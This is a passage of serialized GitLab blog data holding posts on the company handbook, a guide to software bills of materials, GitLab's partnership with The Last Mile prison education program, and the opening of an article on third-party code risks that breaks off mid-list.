are then announced via Slack or our [company call].\nThe handbook also has its own [changelog] which you can check regularly to see what has been changed over time.\n\n[onboarding process]: https://handbook.gitlab.com/handbook/people-group/general-onboarding/\n[values-history]: https://gitlab.com/gitlab-com/www-gitlab-com/commits/master/source/handbook/values/index.html.md\n[company call]: https://handbook.gitlab.com/handbook/communication/\n[changelog]: https://handbook.gitlab.com/handbook/about/changelog/\n\n## One book to be read by them all\n\nIn 2018 we had several hundred thousand page views on pages in the handbook. It is hard to tell which views come from GitLab team-members and which from the wider community.\nAmong the most-read pages are our [Markdown Guide], the pages about [global compensation], our [values], the [hiring process], our [product], [benefits], and how to [communicate].\nThese pages are topics of general interest to people within and outside the company.\nWhat could be a better resource to potential candidates than those pages that show the inner workings of GitLab?\n\n### How do you find anything in the handbook?\n\nThe handbook has a search function; you can use the [index page](https://handbook.gitlab.com/) as an entry point, or just use your favorite search engine to find information.\nWhenever someone asks a question in our Slack, there is a high probability that someone will answer with a link to the handbook.\nIf someone asks a question that has no answer in the handbook, we highly encourage people to add that information to document it and make it easier for future GitLab team-members to find answers.\n\n> Whenever someone asks a question in our Slack, there is a high probability that someone will answer with a link to the handbook\n\n[Markdown Guide]: https://handbook.gitlab.com/handbook/markdown-guide/\n[global compensation]: https://handbook.gitlab.com/handbook/total-rewards/compensation/\n[product]: 
https://handbook.gitlab.com/handbook/product/\n[communicate]: https://handbook.gitlab.com/handbook/communication/\n[values]: https://handbook.gitlab.com/handbook/values/\n[benefits]: https://handbook.gitlab.com/handbook/total-rewards/benefits/\n[hiring process]: https://handbook.gitlab.com/handbook/hiring/\n\n## One book to be the future\n\nWe hope that this glimpse into the handbook is as interesting for you as it was for us.\nIn an all-remote company it is especially important to write everything down, so that no matter\nwhere you are in the world or what time zone you choose to work in, the information you need is accessible.\nAt the moment we are happy to say that we think that the handbook works as well for us now as it did with 100 employees.\nIt aligns with our [values] more than ever.\n\nFor us it is the most transparent way to collaborate on documentation of company internals.\nWe are able to efficiently iterate on topics, resulting in more in-depth coverage over time.\nPersonally the authors cannot see many reasons why the handbook should not be able to scale even further.\nEventually it will evolve further, from the three tomes we have today, to a digital encyclopedia.\nWe are definitely excited to see what the future holds!\n\nHave you taken inspiration from our handbook? 
Let us know by tweeting [@gitlab](https://twitter.com/gitlab).\n\nPhoto by [Beatriz Pérez Moya](https://unsplash.com/photos/XN4T2PVUUgk?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/books?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[779,1099,803,9],{"slug":4868,"featured":6,"template":689},"the-gitlab-handbook-by-numbers","content:en-us:blog:the-gitlab-handbook-by-numbers.yml","The Gitlab Handbook By Numbers","en-us/blog/the-gitlab-handbook-by-numbers.yml","en-us/blog/the-gitlab-handbook-by-numbers",{"_path":4874,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4875,"content":4881,"config":4887,"_id":4889,"_type":14,"title":4890,"_source":16,"_file":4891,"_stem":4892,"_extension":19},"/en-us/blog/the-ultimate-guide-to-sboms",{"title":4876,"description":4877,"ogTitle":4876,"ogDescription":4877,"noIndex":6,"ogImage":4878,"ogUrl":4879,"ogSiteName":673,"ogType":674,"canonicalUrls":4879,"schema":4880},"The ultimate guide to SBOMs","Learn what a software bill of materials is and why it has become an integral part of modern software development.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664571/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","https://about.gitlab.com/blog/the-ultimate-guide-to-sboms","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The ultimate guide to SBOMs\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-10-25\",\n      }",{"title":4876,"description":4877,"authors":4882,"heroImage":4878,"date":4883,"body":4884,"category":865,"tags":4885,"updatedDate":4886},[862],"2022-10-25","In today's rapidly evolving digital landscape, the emphasis on application security within the software supply chain has never been more critical. 
The integration of upstream dependencies into software requires transparency and security measures that can be complex to implement and manage. This is where a software bill of materials (SBOM) becomes indispensable.\n\nServing as a comprehensive list of ingredients that make up software components, an SBOM illuminates the intricate web of libraries, tools, and processes used across the development lifecycle. Coupled with vulnerability management tools, an SBOM not only reveals potential vulnerabilities in software products but also paves the way for strategic risk mitigation. Our guide dives deep into SBOMs, their pivotal role in a multifaceted [DevSecOps](/topics/devsecops/) strategy, and strategies for improving your application's SBOM health — all aimed at fortifying your organization's cybersecurity posture in a landscape full of emerging threats.\n\nYou'll learn:\n- [What is an SBOM?](#what-is-an-sbom%3F)\n- [Why SBOMs are important](#why-sboms-are-important)\n- [Types of SBOM data exchange standards](#types-of-sbom-data-exchange-standards)\n- [Benefits of pairing SBOMs and software vulnerability management](#benefits-of-pairing-sboms-and-software-vulnerability-management)\n- [GitLab and dynamic SBOMs](#gitlab-and-dynamic-sboms)\n    - [Scale SBOM generation and management](#scale-sbom-generation-and-management)\n    - [Ingest and merge SBOMs](#ingest-and-merge-sboms)\n    - [Accelerate mitigation for better SBOM health](#accelerate-mitigation-for-better-sbom-health)\n    - [Continuous SBOM analysis](#continuous-sbom-analysis)\n    - [Building trust in SBOMs](#building-trust-in-sboms)\n - [The future of GitLab SBOM functionality](#the-future-of-gitlab-sbom-functionality)\n - [Get started with SBOMs](#get-started-with-sboms)\n - [SBOM FAQ](#sbom-faq)\n\n## What is an SBOM?\n\nAn SBOM is a nested inventory or [list of ingredients that make up software components](https://www.cisa.gov/sbom#). 
In addition to the components themselves, SBOMs include critical information about the libraries, tools, and processes used to develop, build, and deploy a software artifact.\n\nThe SBOM concept has existed [for more than a decade](https://spdx.dev/about/). However, as part of an effort to implement the National Cyber Strategy that the White House released in 2023, [CISA’s Secure by Design framework](https://www.cisa.gov/securebydesign) is helping guide software manufacturers  to adopt secure-by-design principles and integrate cybersecurity into their products. The U.S. government [issued best practices](/blog/comply-with-nist-secure-supply-chain-framework-with-gitlab/) that are driving application developers selling to the public sector to include SBOMs with their software packages. The private sector is not far behind, sending SBOMs on the path to ubiquity. \n\nAlthough SBOMs are often created with stand-alone software, platform companies like GitLab are integrating SBOM generation early and deep in the DevSecOps workflow.\n\n![supply chain security sdlc](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673653/Blog/Content%20Images/supply_chain_security_sdlc.png)\n\n## Why SBOMs are important\n\nModern software development is laser-focused on delivering applications at a faster pace and in a more efficient manner. This can lead to developers incorporating code from open source repositories or proprietary packages into their applications.  According to Synopsys’s 2024 Open Source Security and Risk Analysis report, which consolidated findings from more than 1,000 commercial codebases across 17 industries in 2023, 96% of the total codebases contained open source and 84% of codebases assessed for risk contained vulnerabilities.\n\nPulling in code from unknown repositories increases the potential for vulnerabilities that can be exploited by hackers. 
In fact, the [2020 SolarWinds attack](https://www.techtarget.com/whatis/feature/SolarWinds-hack-explained-Everything-you-need-to-know) was sparked by the activation of a malicious injection of code in a package used by SolarWinds’ Orion product. Customers across the software supply chain were significantly impacted. Other attacks, including the log4j vulnerability that impacted a number of commercial software vendors, cemented the need for a deep dive into application dependencies, including containers and infrastructure, to be able to assess [risk throughout the software supply chain](https://about.gitlab.com/blog/the-ultimate-guide-to-software-supply-chain-security/).\n\nThere is also a cost component to finding and remediating a software security vulnerability that levels up the need for SBOMs, as well as damage to a company’s reputation that a software supply chain attack can incur. SBOMs give you insight into your dependencies and can be used to look for vulnerabilities, and licenses that don’t comply with internal policies.\n\n## Types of SBOM data exchange standards\n\nSBOMs work best when their generation and interpretation of information such as name, version, packager, and more are able to be automated. This happens best if all parties use a standard data exchange format.\n\nThere are two main types of SBOM data exchange standards in use today:\n- [OWASP CycloneDX](https://cyclonedx.org/capabilities/sbom/)\n- [SPDX](https://spdx.dev/)\n\nGitLab uses CycloneDX for its SBOM generation because the standard is prescriptive and user-friendly, can simplify complex relationships, and is extensible to support specialized and future use cases. 
In addition, [cyclonedx-cli](https://github.com/CycloneDX/cyclonedx-cli#convert-command) and [cdx2spdx](https://github.com/spdx/cdx2spdx) are open source tools that can be used to convert CycloneDX files to SPDX if necessary.\n\n## Benefits of pairing SBOMs and software vulnerability management\n\nSBOMs are highly beneficial for DevSecOps teams and software consumers for several reasons:\n* They enable a standard approach to understanding what additional software components are in an application and where they are declared.\n* They provide ongoing visibility into the history of an application’s creation, including details about third-party code origins and host repositories.\n* They provide a deep level of security transparency into both first-party developed code and adopted open source software.\n* The details that SBOMs offer enable a DevOps team to identify vulnerabilities, assess the potential risks, and then mitigate them. \n* SBOMs can deliver the transparency that application purchasers now demand.\n\n## GitLab and dynamic SBOMs\n\nFor SBOMs to be fully impactful, organizations must be able to automatically generate them, connect them with application security scanning tools, integrate the vulnerabilities and licenses into a dashboard for easy comprehension and actionability, and update them continuously. GitLab supports all of these goals.\n\n![Dynamic SBOM management](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673653/Blog/Content%20Images/Screenshot_2024-05-03_at_10.53.28_AM.png)\n\n### Scale SBOM generation and management\nTo comply with internal policies and regulations, it is key to have accurate and comprehensive SBOMs that cover open source, third-party, and proprietary software. To effectively manage SBOMs for each component and product version, a streamlined process is required for creating, merging, validating and approving SBOMs. 
GitLab’s [Dependency List feature](https://docs.gitlab.com/ee/user/application_security/dependency_list/) aggregates known vulnerability and license data into a single view within the GitLab user interface. Dependency graph information is also generated as part of the dependency scanning report. This empowers users to gain comprehensive insights into dependencies and risk within their projects or across groups of projects. Additionally, a JSON CycloneDX formatted artifact can be produced in the CI pipeline. This API introduces a more nuanced and customizable approach to SBOM generation. SBOMs are exportable from the UI, a specific pipeline or project, or via the GitLab API. \n\n### Ingest and merge SBOMs\nGitLab can ingest third-party SBOMs, providing a deep level of security transparency into both third-party developed code and adopted open source software. With GitLab, you can use a [CI/CD](https://about.gitlab.com/topics/ci-cd/) job to seamlessly merge multiple CycloneDX SBOMs into a single SBOM. Using implementation-specific details in the CycloneDX metadata of each SBOM, such as the location of build and lock files, duplicate information is removed from the resulting merged file. This data is also augmented automatically with license and vulnerability information for the components inside the SBOM.\n\n### Accelerate mitigation for better SBOM health\nBuilding high-quality products faster requires actionable security findings so developers can address the most critical weaknesses. GitLab helps secure your supply chain by [scanning for vulnerabilities](https://docs.gitlab.com/ee/user/application_security/secure_your_application.html) in source code, containers, dependencies, and running applications. 
GitLab offers full security scanner coverage from Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), container scanning, and software composition analysis (SCA) features to help you achieve full coverage against emerging threat vectors.\nTo help developers and security engineers better understand and remediate vulnerabilities more efficiently, [GitLab Duo](https://about.gitlab.com/gitlab-duo/) Vulnerability Explanation, an AI-powered feature, provides an explanation about a specific vulnerability, how it can be exploited, and, most importantly, a recommendation on how to fix the vulnerability. When combined with GitLab Duo Vulnerability Resolution, DevSecOps teams can intelligently identify, analyze, and fix vulnerabilities in just a matter of clicks.\n\nThe platform also supports creation of new policies (and [compliance enforcement](https://docs.gitlab.com/ee/administration/compliance.html)) based on newly detected vulnerabilities. \n\n### Continuous SBOM analysis \nGitLab Continuous Vulnerability Scanning triggers a scan on all projects where either container scanning, dependency scanning, or both, are enabled independent of a pipeline.  When new Common Vulnerabilities and Exposures (CVEs) are reported to the National Vulnerability Database (NVD), users don’t need to re-run their pipelines to get the latest feeds. GitLab’s Vulnerability Research Team adds them to GitLab’s Advisory Database and those advisories are automatically reported up to GitLab as vulnerabilities. This makes GitLab’s SBOM truly dynamic in nature. \n\n### Building trust in SBOMs\nOrganizations that require [compliance functionality](https://about.gitlab.com/solutions/compliance/) can use GitLab to [generate attestation for all build artifacts](/blog/securing-the-software-supply-chain-through-automated-attestation/) produced by the GitLab Runner. 
The process is secure because it is produced by the GitLab Runner itself with no handoff of data to an external service.\n\n## The future of GitLab SBOM functionality\n\nSoftware supply chain security continues to be a critical topic in the cybersecurity and software industry due to frequent attacks on large software vendors and the focused efforts of attackers on the open source software ecosystem. And although the SBOM industry is evolving quickly, there are still concerns around how SBOMs are generated, the frequency of that generation, where they are stored, how to combine multiple SBOMs for complex applications, how to analyze them, and how to leverage them for application health.\n\nGitLab has made SBOMs an integral part of its [software supply chain direction](https://about.gitlab.com/direction/supply-chain/) and continues to improve upon its SBOM capabilities within the DevSecOps platform, including planning new features and functionality. Recent enhancements to SBOM capabilities include the automation of attestation, digital signing for build artifacts, and support for externally generated SBOMs.\n\nGitLab has also established a robust [SBOM Maturity Model](https://handbook.gitlab.com/handbook/security/security-assurance/dedicated-compliance/sbom-plan/) within the platform that involves steps such as automatic SBOM generation, sourcing SBOMs from the development environment, analyzing SBOMs for artifacts, and advocating for the digital signing of SBOMs. GitLab also plans to add automatic digital signing of build artifacts in future releases. \n\n## Get started with SBOMs\n\nThe demand for SBOMs is already high. 
Government agencies increasingly recommend or require SBOM creation for software vendors, federal software developers, and even open source communities.\n\n> To get ahead of this requirement, check out the SBOM capabilities for GitLab Ultimate in [GitLab’s DevSecOps platform](https://gitlab.com/-/trials/new).\n\n## SBOM FAQ\n\n**What is an SBOM?**\n\nAn SBOM is a detailed inventory that lists all components, libraries, and tools used in creating, building, and deploying software. This comprehensive list goes beyond mere listings to include vital information about code origins, thus promoting a deeper understanding of an application's makeup and potential vulnerabilities.\n\n**Why are SBOMs important?**\n\nSBOMs are crucial for several reasons. They provide:\n- Insight into dependencies: Understanding what makes up your software helps identify and mitigate risks associated with third-party components.\n- Enhanced security: With detailed visibility into application components, organizations can pinpoint vulnerabilities quickly and take steps to address them.\n- Regulatory compliance: Increasingly, regulations and best practices recommend or require an SBOM for software packages, particularly for those in the public sector.\n- Streamlined development: Developers can lean on an SBOM for insights into used libraries and components, saving time and reducing errors in the development cycle.\n\n**What standards are used for SBOM data exchange?**\n\nThere are two predominant standards:\n- CycloneDX: Known for its user-friendly approach, CycloneDX simplifies complex relationships between software components and supports specialized use cases.\n- SPDX: Another widely used framework for SBOM data exchange, providing detailed information about components within the software environment.\n\nGitLab specifically employs CycloneDX for its SBOM generation because of its prescriptive nature and extensibility to future needs.\n\n**What is GitLab’s approach to SBOMs?**\n\nGitLab 
emphasizes the creation of dynamic SBOMs that can be:\n- Automatically generated: Ensuring up-to-date information on software composition.\n- Integrated with tools: Connecting to vulnerability scanning tools for thorough risk assessment.\n- Easily managed: Supporting ingestion and merging of SBOMs for comprehensive analysis.\n- Continuously analyzed: Offering ongoing scanning of projects to detect new vulnerabilities as they emerge.\n\n**How can I start implementing SBOMs in my organization?**\n\nFor organizations ready to adopt SBOMs, GitLab’s Ultimate package provides a robust platform for generating and managing SBOMs within a DevSecOps workflow. By leveraging GitLab’s tools, teams can ensure compliance, enhance security, and optimize development practices.\n\nThe increasing demand for SBOMs reflects the growing emphasis on software security and supply chain integrity. By integrating SBOM capabilities, organizations can better protect themselves against vulnerabilities and comply with emerging regulations.\n\n> [Try GitLab Ultimate free for 30 days today.](https://about.gitlab.com/free-trial/devsecops/)\n\n_Disclaimer This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. 
The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab._",[865,867,753,9,184],"2024-05-02",{"slug":4888,"featured":6,"template":689},"the-ultimate-guide-to-sboms","content:en-us:blog:the-ultimate-guide-to-sboms.yml","The Ultimate Guide To Sboms","en-us/blog/the-ultimate-guide-to-sboms.yml","en-us/blog/the-ultimate-guide-to-sboms",{"_path":4894,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4895,"content":4901,"config":4906,"_id":4908,"_type":14,"title":4909,"_source":16,"_file":4910,"_stem":4911,"_extension":19},"/en-us/blog/thelastmile-gitlab",{"title":4896,"description":4897,"ogTitle":4896,"ogDescription":4897,"noIndex":6,"ogImage":4898,"ogUrl":4899,"ogSiteName":673,"ogType":674,"canonicalUrls":4899,"schema":4900},"Inside the collaboration between GitLab and The Last Mile","GitLab teamed up with The Last Mile to bring open source DevOps and tech mentorship to incarcerated populations across the United States.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681743/Blog/Hero%20Images/tlm-blogpost-banner.png","https://about.gitlab.com/blog/thelastmile-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Inside the collaboration between GitLab and The Last Mile\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christina Hupy, Ph.D.\"}],\n        \"datePublished\": \"2020-11-13\",\n      }",{"title":4896,"description":4897,"authors":4902,"heroImage":4898,"date":3635,"body":4904,"category":10,"tags":4905},[4903],"Christina Hupy, Ph.D.","\n\n[The Last Mile (TLM)](https://thelastmile.org/), an organization focused on changing lives through technology, is tackling the daunting problem of mass incarceration in the United States by providing education and career training opportunities to incarcerated individuals to help break the generational cycle of incarceration. 
GitLab team members with similar passions and ideas connected with The Last Mile team and built a partnership to help bring the tech industry and mentorship directly to incarcerated individuals.\n\n## AMA to Coffee Chat to Partnership\n\nThe idea for TLM partnership originated during an AMA (or \"Ask Me Anything\" session) between GitLab CEO, [Sid Sijbrandij](/company/team/#sytses), and GitLab team members. [In one of these AMAs](https://www.youtube.com/watch?v=qi9zrymBO8o), [Tucker Logan](/company/team/#tuckcodes), a federal solutions architect at GitLab, asked Sid about the inspiration behind his [tweet](https://twitter.com/sytses/status/1227319454817804288) about mass incarceration. In a follow-up question, [Morgen Smith](/company/team/#msmith6), a sales development representative (SDR) for the Americas, asked Sid if GitLab would consider creating initiatives to help combat the school-to-prison pipeline.\n\nAs a former educator, Morgen has witnessed first-hand the national trend of disadvantaged youth being agressively disciplined in schools, which can then lead to juvenile offenses and later to formal charges. During the AMA, Morgen asked Sid: \"What do you think GitLab could do to encourage minority youth in this situation to be inspired by opportunities in tech?\" Sid shared his support and passion for the topic, and invited Morgen and Tyler to host an [open coffee chat](/company/culture/all-remote/informal-communication/#coffee-chats) on the topic to brainstorm ideas and next steps.\n\nDuring the coffee chat, Sid decided to take the smallest step, first. He visited San Quentin State Prison in San Rafael, Calif., and organized a call with Chris Redlitz, a co-founder of TLM. It turns out that TLM was using GitLab internally and also using the GitLab Community Edition to train nearly 300 students participating in their programs about how to use DevOps.\n\nTLM is a nonprofit program that started at San Quentin. 
TLM works with the incarcerated populations at men’s, women’s, and young adult correctional facilities to help them build relevant skills in technology with the goal of preparing individuals for successful reentry and building careers in business and technology. Today, TLM is in 23 classrooms across six states and has served 622 students since its inception.\n\n## TLM students learn DevOps with GitLab\n\nParticipants in TLM use the self-managed, free open core version of GitLab in their courses on Web Development. Each of the twenty individual classrooms have their own self-managed instance which around 20 students use to create and host their own private repositories. The sandbox environments are deployed centrally via Google Cloud. The core curriculum includes HTML/CSS and JavaScript, Node.js, Express.js, React.js, and Mongodb. GitLab is used primarily as a [source code management tool](/solutions/source-code-management/) for the students. Students write and commit code to personal repositories during course assignments. TLM Remote Instruction team also manages student-facing GitLab repositories to demonstrate industry best practices in merging, code collaboration, and version control platforms. Additionally, TLM leverages GitLab by providing students access to their repositories after they are released from prison, preserving commit history and all version control for the aspiring coders.\n\n\"By utilizing GitLab, The Last Mile students become comfortable using a best-in-class open source DevOps tool,\" says Tulio Cardozo, IT Manager, TLM. \"This experience empowers our students as aspiring software engineers, enabling them to enter the workforce with the collaboration and communication framework skills employers demand.\"\n\nThe GitLab team is partnering with the TLM Programs department to organize a series of webinars and workshops for the students. 
The first webinar kicked off in June of 2020 and was broadcast to 27 students (men, women, and youth programs), across four classrooms in several states. The topic was an introduction to GitLab and DevOps. Sid joined and shared the story of founding GitLab and his journey in tech. [Brendan O’Leary](/company/team/#brendan), a senior developer evangelist at GitLab, provided an overview of DevOps and explained how GitLab is the first single application for the entire DevOps lifecycle.\n\n\"The students appreciated the information on how to get started as new developers. Sid and Brendan helped the students believe they could accomplish anything with enough hard work,\" says a classroom facilitator from the Pendleton Youth Correctional Facility in Indiana.\n\nThe TLM team added that the webinar exposed students to a large company that works remotely and introduced them to an industry-recognized brand that the students use. In addition to the value of the content itself, there was a Q&A portion of the session where the students asked questions about the technology itself, such as how to start an open-source project and protecting intellectual property in open source, and about the facilitators' personal journey into tech.\n\nWatch the webinar with GitLab and TLM below.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/ejHmvMjXJVU\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nIn addition to the general workshop, the teams also collaborated on more technical content. The students at the Pendleton Juvenile Correctional Facility had a very special guest visit their [Web Development Fundamentals Course](https://thelastmile.org/our-work/), [Natalia Tepluhina](/company/team/#ntepluhina). 
Natalia, who currently lives in Ukraine, is a frontend engineer at GitLab and also serves as a [core Vue.js team member](https://vuejs.org/v2/guide/team.html) and [core team member](/community/core-team/) of GitLab itself. Natalia answered a variety of questions about how to approach learning JavaScript and provided a few demos related to specific questions from the students.\n\n## Mentorship for a career in DevOps\n\nGitLab and TLM also partnered on a series of Technical recruiting workshops with the classrooms. These have definitely been one of the highlights of the partnership thus far. In these workshops, a GitLab recruiter gave a presentation on the technical recruiting processes at GitLab, best practices during the application process and interview process, as well as an overview of what to expect during an interview. During each of the four sessions, the recruiters directly engaged with the participants, who asked a variety of questions, including:\n\n* How do I address incarceration on my resume?\n* What about background checks?\n* How do I gain professional experience while incarcerated?\n\nThe GitLab recruiting team was very sensitive to the participants' concerns and provided honest, clear answers, and great suggestions. The recruiters shared that during the process candidates should think of their recruiter as a resource, and they can always ask to speak to the People team at GitLab in confidence if it would help reassure them with any concerns they have regarding their criminal records. The recruiters encouraged the students to highlight their work in TLM courses on their resume and think about whether they can use course projects to start to build a portfolio. 
In addition, the facilitators encouraged participants to think about contributing to open source projects as a way to build technical skills, increase their network and mentorship opportunities.\n\n## How can open source help incarcerated populations gain experience in tech?\n\nThe discussion around contributing to open source projects as a way to build technical skills sparked a few different exciting ideas with the teams. One of these ideas was to hold a first-time contributor workshop with alumni from TLM. The workshop was held in September 2020 and had 16 alumni participants, four GitLab team members, including Sid, and five TLM team members. The workshop covered the basics on how to contribute to GitLab and demonstrated the step-by-step process. Participants were [provided an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/247284) with a list of simple fixes with the label [\"good-for-new-contributors\"](https://gitlab.com/groups/gitlab-org/-/labels?utf8=%E2%9C%93&subscribed=&search=good+for+new+contributors) in the GitLab docs or handbook with typos or other minor changes. We had a few merge requests after just a few hours of the workshop! Participants were encouraged to tag GitLab team members for recognition and to win a pair of tanuki socks – by the end of the week we had given away six pairs of socks.\n\nParticipants and instructors appreciated the opportunity to learn in a hands-on way during the workshop:\n\n\"Thank you for the opportunity to participate in the GitLab workshop. I am so grateful to the GitLab staff for taking the time to introduce those of us who are new to GitLab to the history and functionality of the company. I learned so much, not just about how I can utilize GitLab to accomplish personal tasks more efficiently, but also how I can contribute and collaborate more with others and contribute to my local and global communities.\" - TLM staff and alumna.\n\nThe GitLab team found the experience equally rewarding. 
\"Working with The Last Mile was such a rewarding experience! When I think about how our product takes in contributions from all over the world and knowing it is also leveraged by those currently and or previously incarcerated really shows how truly 'inclusive' Git can be. Additionally, the empowerment it offers and the gift of knowledge and skill that can't be taken away is invaluable,\" says [Candace Brydsong Williams](/company/team/#cwilliams3), manager of the Diversity, Inclusion and Belonging program at GitLab.\n\n## How TLM uses GitLab technology\n\nGitLab also provides free licenses of our top-tier hosted application for the TLM team, who use our DevOps technology in nearly every aspect of their operations.\n\nTLM transitioned from GitHub to GitLab in 2019 after we provided the licenses. Initially, GitLab was used primarily in TLM's engineering department to track all internal processes with issues and Wikis. Infrastructure as code data and internal information is stored in repositories. Soon, TLM adopted GitLab technology in their education and programs departments, where it is now being used for project management. TLM now uses sprint planning, milestones, issues, priority levels, burndown charts, and issues boards to streamline project management across their departments.\n\nThe Last Mile has introduced numerous new and distinct use cases for GitLab. These include:\n\n* Issues are used to manage classroom facilities including to keep track of the impacts of COVID-19 on each classroom. For example, status updates are recorded on the issue and in the comments.\n* [The Last Mile’s reentry program](https://thelastmile.org/our-work/#reentry) uses GitLab to track returned citizen onboarding and service delivery process as well as tracking internal workloads, task efforts, and collaboration across teams. 
To-do lists are used to manage actions and labels are used to view the status of various efforts.\n\n\"The GitLab platform provides The Last Mile with a remarkable range of solutions -- from our application of GitOps workflows for managing our hybrid infrastructure, to our org-wide application of issues across teams,\" says Mike Bowie, Director of Engineering, The Last Mile. \"By solving such a broad range of our needs, GitLab enables us to focus on delivering value into our programs, instead of administering and maintaining a plethora of disparate tools.\"\n",[9,910,779,803,1036],{"slug":4907,"featured":6,"template":689},"thelastmile-gitlab","content:en-us:blog:thelastmile-gitlab.yml","Thelastmile Gitlab","en-us/blog/thelastmile-gitlab.yml","en-us/blog/thelastmile-gitlab",{"_path":4913,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4914,"content":4920,"config":4925,"_id":4927,"_type":14,"title":4928,"_source":16,"_file":4929,"_stem":4930,"_extension":19},"/en-us/blog/third-party-code-risks",{"title":4915,"description":4916,"ogTitle":4915,"ogDescription":4916,"noIndex":6,"ogImage":4917,"ogUrl":4918,"ogSiteName":673,"ogType":674,"canonicalUrls":4918,"schema":4919},"4 Risks to consider when implementing third-party code","Third-party code is a great resource for businesses, but comes with a number of risks. 
Explore four ways developers can keep their code secure.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680662/Blog/Hero%20Images/third-party-code-risks.jpg","https://about.gitlab.com/blog/third-party-code-risks","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Risks to consider when implementing third-party code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Vanessa Wegner\"}],\n        \"datePublished\": \"2019-07-16\",\n      }",{"title":4915,"description":4916,"authors":4921,"heroImage":4917,"date":4922,"body":4923,"category":682,"tags":4924},[1916],"2019-07-16","\n\nManaging a complex ecosystem of software and partnerships is a fundamental need\nfor today’s businesses. Most enterprises run hundreds of mission-critical apps,\nmany of which are either out-of-the-box or customized third-party solutions.\nThe benefit of third-party software is clear: It saves time, resources, and\nallows you to implement new capabilities quickly, efficiently, and at scale.\n\nUnfortunately, with great reward comes some risk. Many of last year’s most\nsignificant breaches – like CSC, Best Buy, and Delta – were due to missed\nvulnerabilities in the company's third-party applications. For example, Best Buy suffered a breach\nvia their online chat service, [24]7.ai, [which had stored BestBuy customer\npayment data on its servers](https://www.pcmag.com/news/360306/best-buy-suffers-customer-payment-data-breach).\n\nBringing on new, third-party software can be an exciting step forward for your\nworkload and projects, allowing you to add new capabilities, build on the open source\ncommunity, and leverage some of the best code out there. However, each new\npartnership creates an opportunity for hackers to access your systems and\ndata. 
Even if your vendors claim to be secure, their code might not necessarily\nlive up to the security standards and compliance requirements of your business.\nDevelopers can’t leave all risk management up to their security counterparts;\ndevelopers need to share that responsibility just as they share responsibility\nfor writing their own secure code.\n\n## Risks developers should know about third-party code\n\n1. As Bogdan Rancea writes, open source code fragments are downloaded hundreds\nor thousands of times a day – [and not everyone is contributing secure code or\nmaintaining a secure code sharing system](https://ecommerce-platforms.com/articles/the-dangers-of-third-party-code-dependency).\nThe more complex the code, the easier it is for a few lines of malicious code\nto go undetected.\n1. Rigorous testing is often overlooked for third-party code. If third-party code touches your\ndata, it should be tested – but many businesses either don’t test or complete the\nbare minimum required by their compliance teams.\n1. Standard third-party script tracking is documented, but [there may be\nadditional tracking that isn’t disclosed](https://css-tricks.com/potential-dangers-of-third-party-javascript/).\nThese scripts may be collecting data across your website and apps, storing\npersonally identifiable information from your customers as they engage with your business.\n1. When a breach occurs, your brand will be held responsible. When your\ncustomers’ data is at stake, it doesn’t matter if the breach happens on\nthird-party soil; if it’s your data, it’s your problem.\n\n## Protect your company and customers by planning ahead\n\nWhile a breach may be inevitable, the disastrous aftermath isn’t. Proactive\nsecurity measures in third-party relationships can save your company a lot of\nheartache in the long run, and developers are well suited to lead the charge.\nHere are a few best practices to follow:\n\n### 1. 
Take inventory of all of your current third-party relationships\n\nBegin with where you are now: Create a list of every third-party program used across your\ncompany. Make sure you know what code is being used, who the contact person is\nboth internally and at the vendor (if applicable), and understand what data is\nbeing accessed or stored by the third party. You may choose to pursue security\nconversations and testing with certain vendors based on the classification of\nthe data they work with, making an inventory of third-party relationships a valuable tool to prioritize.\nOnce your inventory is complete, it may be useful to consider a third-party or\nopen source code audit to thoroughly investigate your code ecosystem.\n\n### 2. Work with security to create formal requirements for all new third parties\n\nEstablishing standards will allow your team to vet potential collaborators and\nensure that any new software or code isn’t posing an unnecessary risk to your\nbusiness. It will also help to serve as a requirements guide during the\nprocurement process and can mitigate internal conflict when trying to get new tools\napproved. If you’re unsure where to start, begin by looking at the\nrequirements of all the legal regulations that apply to your business, such as\nGDPR. You could also look at how the third-party code or tools will interact\nwith your data, systems, and software and create requirements based on what\nwill help you best protect the business.\n\n### 3. Take on a security mindset: It’s everyone’s responsibility\n\nWhen hackers are trying to find any possible way in, it’s important that your entire\norganization – not just the security department – feels responsible for and capable of\ncontributing to your company’s security posture. Widespread security awareness\nwill hopefully make security a priority whenever a team is evaluating a new\ntool or code fragment.\n\n### 4. 
